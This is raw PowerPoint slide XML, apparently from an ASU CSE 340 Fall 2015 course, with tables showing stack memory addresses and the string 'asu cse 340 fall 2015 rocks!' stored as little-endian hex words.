                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</a:t>
                      </a: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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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180</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x804840c</a:t>
                      </a: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277190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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160499382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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x21736b63)</a:t>
                      </a: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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</a:t>
                      </a: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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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181</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x804840c</a:t>
                      </a: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277190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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58911000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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>(0x21736b63)</a:t>
                      </a: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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</a:t>
                      </a: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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
